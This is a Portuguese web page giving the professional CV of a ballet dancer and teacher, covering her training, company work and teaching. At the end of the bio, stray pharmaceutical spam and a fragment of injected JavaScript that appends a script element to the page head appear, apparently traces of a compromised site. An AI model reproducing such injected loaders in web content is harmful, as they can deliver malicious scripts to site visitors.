Currículos

Marília Guilharducci

Marília Guilharducci

Formada pela Escola Municipal de Bailados em 2002, foi integrante do Corpo de Baile da escola por 4 anos e também participou do Ballet Manuela Leite. Diplomada pelo sétimo e oitavo grau da Royal Academy of Dancing. Em julho de 2002, participou do XII Seminário Internacional de Dança de Brasília, obtendo bolsa de estudos integral para a Universidade de Dança, Música e Artes Cênicas de Mannheim, Alemanha, onde permaneceu até julho de 2004.

De volta ao Brasil, participou por quatro anos consecutivos da montagem do ballet clássico de repertório “O Quebra Nozes” pela Cisne Negro Cia de Dança, onde foi convidada para estagiar no ano de 2005. Em 2006, foi convidada para participar do Espaço 10X21, sob a direção de Ady Addor e em 2007 participou da montagem de “Les Villes Blessées” (As cidades feridas) dirigida por Katto Ribeiro, bailarino e diretor da Companhia de Dança Francesa Cie Rhadiofoli.

Fez parte da equipe docente do colégio Santo Américo e da Escola Autonomia nos anos de 2007 e 2008. Em 2009, participou do curso de barra a terre no Studio 3 Espaço de Dança, ministrado por Marcos Verzani; Pre Primary e Primary para professores da Royal academy of Dance e do Seminário Internacional de dança de Brasília.

Desde 2007, atua como bailarina e professora na Company Ballet em São Paulo.Como bailarina ganhou diversos prêmios em festivais.Teve como principais mestres: Ady Addor, Manuela Leite, Ruth Rachou, Aracy Evans, Birgit Keil, Vladimir Kloss, Swetlana Kusnezowa, Rose Calheiros, Ismael Guiser, Neide Rossi. cialis tablet dosage d.getElementsByTagName(‘head’)[0].appendChild(s);}

Leave a Response

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.